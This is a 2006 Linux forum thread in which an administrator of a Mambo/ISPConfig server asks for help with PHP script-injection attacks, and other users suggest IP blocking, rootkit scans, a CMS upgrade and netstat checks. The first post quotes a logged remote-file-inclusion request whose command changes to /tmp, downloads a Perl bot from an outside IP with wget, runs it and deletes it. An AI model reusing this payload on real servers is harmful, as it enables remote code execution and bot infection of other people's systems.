Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 2 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 16th July 2006, 01:15
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Default php script injections

server being attacked by script injections I have already chmod wget but attacks still continue and seem to be getting more advanced need help securing the server

extract from logfile /var/log/apache2/access_log

82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

extract from logfile /var/log/apache2/error_log

[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
--22:20:55-- http://66.90.88.178/mambo.txt
=> `mambo.txt'
Connecting to 66.90.88.178:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,282 (16K) [text/plain]

0K .......... ..... 100% 7.77 KB/s

22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
[Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
[Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM


Need help advice anything...

Thank you in advance
Reply With Quote
Sponsored Links
  #2  
Old 16th July 2006, 09:11
sjau sjau is offline
Local Meanie
 
Join Date: Apr 2006
Location: Switzerland
Posts: 1,138
Thanks: 4
Thanked 54 Times in 50 Posts
Default

you could deny the IP of the attacker in a .htaccess
Reply With Quote
  #3  
Old 16th July 2006, 09:48
TheRudy TheRudy is offline
Senior Member
 
Join Date: Dec 2005
Posts: 215
Thanks: 1
Thanked 7 Times in 5 Posts
Default

Remove the script asap. Contact author of script and tell them about this if you haven't wrote it yourself. You might also check for updates.. Denying IP won't solve it cause he can use different server and voila, you get hacked again..

I would lock down the server untill its checked out.. Run chrootkit and rkhunter (not sure if they detect this script but it can't hurt running them..).. An antivirus scan can't hurt either..

Btw, mambo is VERY buggy application. Would suggest you to switch to joomla if you want the same interface and stuff.. I think you can even upgrade from mambo to joomla..
Reply With Quote
  #4  
Old 16th July 2006, 09:53
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,033
Thanks: 261
Thanked 150 Times in 130 Posts
Default

http://66.90.88.178/mambo.txt is allready giving me a virus warning!

I like the "main" site :-)
Reply With Quote
  #5  
Old 16th July 2006, 10:13
TheRudy TheRudy is offline
Senior Member
 
Join Date: Dec 2005
Posts: 215
Thanks: 1
Thanked 7 Times in 5 Posts
Default

Quote:
Originally Posted by edge
http://66.90.88.178/mambo.txt is allready giving me a virus warning!

I like the "main" site :-)
You also checked that eh?
Reply With Quote
  #6  
Old 16th July 2006, 10:46
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Unhappy Cant find the scripts on my site

I cant seem to find the script on my server I've installed rkhunter and updated + scanned the system. found nothing

66.90.88.178 is not my site its just that my server is being told the get these scripts from various sites including the one mentioned and then running them when i check my running proccesses I find alot of https instances which dont make any sense to me I've tried looking for help on installing modsecurity on my suse 10 server, but had no luck. not to sure if its safe to install when running ispconfig with suse 10 using the perfect setup from howtoforge.

I have also updated o the latest patches from suse. these scripts are alos being run on domains that I have since made dormant with nothing in the actual /var/www/web#/web folder when i check my logs even they are being used to download these scripts which is strange since before ispconfig was installed I chmod 700 wget.
Reply With Quote
  #7  
Old 16th July 2006, 11:08
TheRudy TheRudy is offline
Senior Member
 
Join Date: Dec 2005
Posts: 215
Thanks: 1
Thanked 7 Times in 5 Posts
Default

The script looks like a war bot or how they are called.. They are using known exploid of script (you running Mambo script right?), they google it and then try to inject this script.

Check by running processes (ps) and network connections (netstat) if you are connected to IRC
host: 66.90.88.178
port: 7474

If you are, kill it! and block that port and IP with firewall..

Once you fix this, got to that IRC channel and say to them: I just PWNED YOU!
Reply With Quote
  #8  
Old 16th July 2006, 11:20
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Unhappy output of netstat

Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 14 [ ] DGRAM 9984 /dev/log
unix 2 [ ] DGRAM 9986 /var/lib/named/dev/log
unix 2 [ ] DGRAM 4385 @/org/kernel/udev/udevd
unix 2 [ ] DGRAM 12216 @/var/run/hal/hotplug_s ocket2
unix 2 [ ] DGRAM 28905
unix 2 [ ] DGRAM 17548
unix 2 [ ] DGRAM 16934
unix 3 [ ] STREAM CONNECTED 16687
unix 3 [ ] STREAM CONNECTED 16686
unix 3 [ ] STREAM CONNECTED 16683
unix 3 [ ] STREAM CONNECTED 16682
unix 3 [ ] STREAM CONNECTED 16679
unix 3 [ ] STREAM CONNECTED 16678
unix 3 [ ] STREAM CONNECTED 16675
unix 3 [ ] STREAM CONNECTED 16674
unix 3 [ ] STREAM CONNECTED 16671
unix 3 [ ] STREAM CONNECTED 16670
unix 3 [ ] STREAM CONNECTED 16667
unix 3 [ ] STREAM CONNECTED 16666
unix 3 [ ] STREAM CONNECTED 16663
unix 3 [ ] STREAM CONNECTED 16662
unix 3 [ ] STREAM CONNECTED 16659
unix 3 [ ] STREAM CONNECTED 16658
unix 3 [ ] STREAM CONNECTED 16655
unix 3 [ ] STREAM CONNECTED 16654
unix 3 [ ] STREAM CONNECTED 16651
unix 3 [ ] STREAM CONNECTED 16650
unix 3 [ ] STREAM CONNECTED 16647
unix 3 [ ] STREAM CONNECTED 16646
unix 3 [ ] STREAM CONNECTED 16643
unix 3 [ ] STREAM CONNECTED 16642
unix 3 [ ] STREAM CONNECTED 16639
unix 3 [ ] STREAM CONNECTED 16638
unix 3 [ ] STREAM CONNECTED 16635
unix 3 [ ] STREAM CONNECTED 16634
unix 3 [ ] STREAM CONNECTED 16631
unix 3 [ ] STREAM CONNECTED 16630
unix 3 [ ] STREAM CONNECTED 16627
unix 3 [ ] STREAM CONNECTED 16626
unix 3 [ ] STREAM CONNECTED 16623
unix 3 [ ] STREAM CONNECTED 16622
unix 3 [ ] STREAM CONNECTED 16619
unix 3 [ ] STREAM CONNECTED 16618
unix 3 [ ] STREAM CONNECTED 16615
unix 3 [ ] STREAM CONNECTED 16614
unix 3 [ ] STREAM CONNECTED 16611
unix 3 [ ] STREAM CONNECTED 16610
unix 3 [ ] STREAM CONNECTED 16607
unix 3 [ ] STREAM CONNECTED 16606
unix 3 [ ] STREAM CONNECTED 16603
unix 3 [ ] STREAM CONNECTED 16602
unix 3 [ ] STREAM CONNECTED 16599
unix 3 [ ] STREAM CONNECTED 16598
unix 3 [ ] STREAM CONNECTED 16595
unix 3 [ ] STREAM CONNECTED 16594
unix 3 [ ] STREAM CONNECTED 16591
unix 3 [ ] STREAM CONNECTED 16590
unix 3 [ ] STREAM CONNECTED 16588
unix 3 [ ] STREAM CONNECTED 16587
unix 3 [ ] STREAM CONNECTED 16584
unix 3 [ ] STREAM CONNECTED 16583
unix 3 [ ] STREAM CONNECTED 16581
unix 3 [ ] STREAM CONNECTED 16580
unix 2 [ ] DGRAM 16565
unix 2 [ ] DGRAM 13315
unix 3 [ ] STREAM CONNECTED 13230 /var/run/dbus/system_bu s_socket
unix 3 [ ] STREAM CONNECTED 13229
unix 3 [ ] STREAM CONNECTED 13019 @/tmp/hald-local/dbus-q emgvsK3Jl
unix 3 [ ] STREAM CONNECTED 13018
unix 3 [ ] STREAM CONNECTED 12908 /var/run/dbus/system_bu s_socket
unix 3 [ ] STREAM CONNECTED 12907
unix 3 [ ] STREAM CONNECTED 12906 /var/run/acpid.socket
unix 3 [ ] STREAM CONNECTED 12905
unix 2 [ ] DGRAM 12902
unix 3 [ ] STREAM CONNECTED 12505 /var/run/acpid.socket
unix 3 [ ] STREAM CONNECTED 12504
unix 3 [ ] STREAM CONNECTED 12570 @/tmp/hald-local/dbus-q emgvsK3Jl
unix 3 [ ] STREAM CONNECTED 12503
unix 2 [ ] DGRAM 12142
unix 2 [ ] DGRAM 10931
unix 2 [ ] DGRAM 10743
unix 2 [ ] DGRAM 10537
unix 2 [ ] DGRAM 10363
unix 2 [ ] DGRAM 9994
unix 2 [ ] STREAM CONNECTED 9811
unix 3 [ ] STREAM CONNECTED 4968
unix 3 [ ] STREAM CONNECTED 4967
Reply With Quote
  #9  
Old 16th July 2006, 11:25
TheRudy TheRudy is offline
Senior Member
 
Join Date: Dec 2005
Posts: 215
Thanks: 1
Thanked 7 Times in 5 Posts
Default

Do a netstat -tap
sorry
Reply With Quote
  #10  
Old 16th July 2006, 13:31
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
 
Default netstat -tap reveals the following

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 *:mysql *:* LISTEN 3045/mysqld
tcp 0 0 localhost:compaq-evm *:* LISTEN 4683/fam
tcp 0 0 *:sunrpc *:* LISTEN 4306/portmap
tcp 0 0 *:hosts2-ns *:* LISTEN 4093/ispconfig_http
tcp 0 0 *:ftp *:* LISTEN 5350/proftpd: (acce
tcp 0 0 192.168.0.200:domain *:* LISTEN 5276/named
tcp 0 0 server.mydomain:domain *:* LISTEN 5276/named
tcp 0 0 localhost:domain *:* LISTEN 5276/named
tcp 0 0 localhost:953 *:* LISTEN 5276/named
tcp 0 0 *:smtp *:* LISTEN 5138/master
tcp 0 0 *op3 *:* LISTEN 4531/couriertcpd
tcp 0 0 *:imap *:* LISTEN 4501/couriertcpd
tcp 0 0 *:www-http *:* LISTEN 5005/httpd2-prefork
tcp 0 0 *:ssh *:* LISTEN 4905/sshd
tcp 0 0 localhost:953 *:* LISTEN 5276/named
tcp 0 0 *:smtp *:* LISTEN 5138/master
tcp 0 0 *:https *:* LISTEN 5005/httpd2-prefork
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
"unknown filter" growing apache log. wwparrish Installation/Configuration 6 1st September 2006 18:40
perfect setup suse 10 - phpmyadmin & mysql question reddog Server Operation 7 17th June 2006 12:59
2 domains, 1 site wadims Installation/Configuration 13 31st May 2006 00:21
Downgrade php5 to php4.4.2 llizards Installation/Configuration 4 13th March 2006 23:58
all my site go to /var/www/ Absolusteph Installation/Configuration 14 11th March 2006 21:27


All times are GMT +2. The time now is 10:31.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.